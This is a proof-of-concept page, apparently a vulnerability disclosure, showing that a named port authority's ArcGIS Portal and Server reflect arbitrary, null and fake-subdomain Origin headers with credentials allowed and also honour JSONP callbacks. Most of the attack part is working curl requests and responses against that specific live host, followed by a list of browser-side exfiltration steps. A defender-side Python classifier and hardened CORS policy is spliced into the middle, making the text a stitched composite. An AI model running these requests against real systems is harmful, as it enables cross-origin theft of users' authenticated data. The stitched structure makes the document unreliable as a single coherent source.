CORS Misconfiguration — Arbitrary Origin Reflection with Credentials

Target: webapps.portofantwerpbruges.com
What this PoC demonstrates: The ArcGIS Portal at webapps.portofantwerpbruges.com reflects any Origin header in Access-Control-Allow-Origin while returning Access-Control-Allow-Credentials: true. This page (hosted on an attacker-controlled origin) silently reads authenticated user data cross-origin — proving full account data exfiltration with zero user interaction beyond visiting a link.

Prerequisites: The victim must be logged into the PoAB ArcGIS Portal with an active SSO session. Open this page in the same browser where you are authenticated.
Part A — Server-Side Evidence (curl)
1. Arbitrary Origin Reflection — https://evil.com
Request:
curl -sk -D- -o /dev/null \
  -H "Origin: https://evil.com" \
  "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json"
Response headers:
HTTP/1.1 200 OK
access-control-allow-origin: https://evil.com
access-control-allow-credentials: true
Impact: The server tells the browser: "Yes, https://evil.com is allowed to read this response, and yes, send the user's cookies with the request." Any attacker-controlled website can read authenticated responses.
2. Null Origin Reflection (sandboxed iframe / data: URI)
Request:
curl -sk -D- -o /dev/null \
  -H "Origin: null" \
  "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json"
Response headers:
HTTP/1.1 200 OK
access-control-allow-origin: null
access-control-allow-credentials: true
Impact: The null origin is exploitable via sandboxed iframes (<iframe sandbox="allow-scripts">), data: URIs, and certain redirect chains — no external hosting required.
3. Subdomain Spoofing — evil.portofantwerpbruges.com
Request:
curl -sk -D- -o /dev/null \
  -H "Origin: https://evil.portofantwerpbruges.com" \
  "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json"
Response headers:
HTTP/1.1 200 OK
access-control-allow-origin: https://evil.portofantwerpbruges.com
access-control-allow-credentials: true
Impact: Even non-existent subdomains are reflected, so the server is not checking against a list of real hosts. Combined with any subdomain takeover or XSS on *.portofantwerpbruges.com, this becomes trivially exploitable.
4. ArcGIS Server REST API — Same Misconfiguration
Request:
curl -sk -D- -o /dev/null \
  -H "Origin: https://evil.com" \
  "https://webapps.portofantwerpbruges.com/arcgis/rest/services/extern/AIS/MapServer/0/query?where=1%3D1&outFields=*&resultRecordCount=1&f=json"
Response headers:
HTTP/1.1 200 OK
access-control-allow-origin: https://evil.com
access-control-allow-credentials: true
Scope: Both /arcgis-portal/sharing/rest/* (Portal) and /arcgis/rest/* (Server) are affected — the entire GIS API surface reflects arbitrary origins with credentials.
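Added defender-side example, not part of this PoC or of the target's code: a classifier that labels captured response headers with the three reflection patterns shown in items 1 to 3 (arbitrary origin, null, unverified subdomain), next to the hardened policy an operator should deploy (exact-match allowlist, no echo of the request Origin, no suffix matching). The allowlist contents are an assumption; the page does not say which origins the portal should trust.

```python
from typing import Dict, Optional
from urllib.parse import urlsplit

SITE_APEX = "portofantwerpbruges.com"
# Assumed trusted-origin allowlist for the fix; the real deployment's
# trusted origins are not given on this page.
ALLOWED_ORIGINS = frozenset({"https://webapps.portofantwerpbruges.com"})


def classify_cors(request_origin: str, headers: Dict[str, str],
                  allowed=ALLOWED_ORIGINS, apex: str = SITE_APEX) -> str:
    """Label one captured response to a request that carried `request_origin`.

    Returns 'no_cors', 'no_credentials', 'not_reflected', 'allowlisted',
    'reflects_null', 'reflects_subdomain' or 'reflects_arbitrary'.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no_cors"
    if not creds:
        return "no_credentials"   # readable, but without the user's session
    if acao != request_origin:
        return "not_reflected"    # a fixed value, not an echo of the request
    if acao in allowed:
        return "allowlisted"      # echoing a vetted origin is the correct answer
    if acao == "null":
        return "reflects_null"
    host = urlsplit(acao).hostname or ""
    if host.endswith("." + apex):
        return "reflects_subdomain"
    return "reflects_arbitrary"


def cors_headers(request_origin: Optional[str],
                 allowed=ALLOWED_ORIGINS) -> Dict[str, str]:
    """Hardened policy: exact-match allowlist, never echo, never 'null'.

    Suffix matching (endswith '.portofantwerpbruges.com') is deliberately
    absent: it is exactly what lets an arbitrary subdomain through.
    """
    if request_origin is None or request_origin not in allowed:
        return {}                 # no CORS headers: the browser blocks the read
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",         # keep caches from serving one origin's reply to another
    }
```

Feed `classify_cors` the header lines from the curl transcripts above and each of items 1 to 3 comes back with its own `reflects_*` label, while `cors_headers` returns nothing at all for those same origins.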
5. JSONP Support — Parallel Exploitation Vector
Request:
curl -sk \
  "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json&callback=steal"
Response body:
steal({"error":{"code":400,"messageCode":"COM_0019","message":"Not logged in.","details":[]}});
Impact: All portal endpoints honour the JSONP callback parameter (the unauthenticated curl above shows the response already wrapped in steal(...)). An attacker can read authenticated data with a simple <script src="...?callback=steal"> tag — this bypasses CORS entirely and works even with strict browser extensions.
Part B — Browser-Side Exploitation (live checks run from the attacker origin)
0. Cross-Origin Response Read Verification
1. Authenticated Identity Exfiltration — /community/self
2. Private Content Enumeration — /search?q=*
3. User Private Content — /content/users/{username}
4. ArcGIS Server Data Access — /arcgis/rest/services
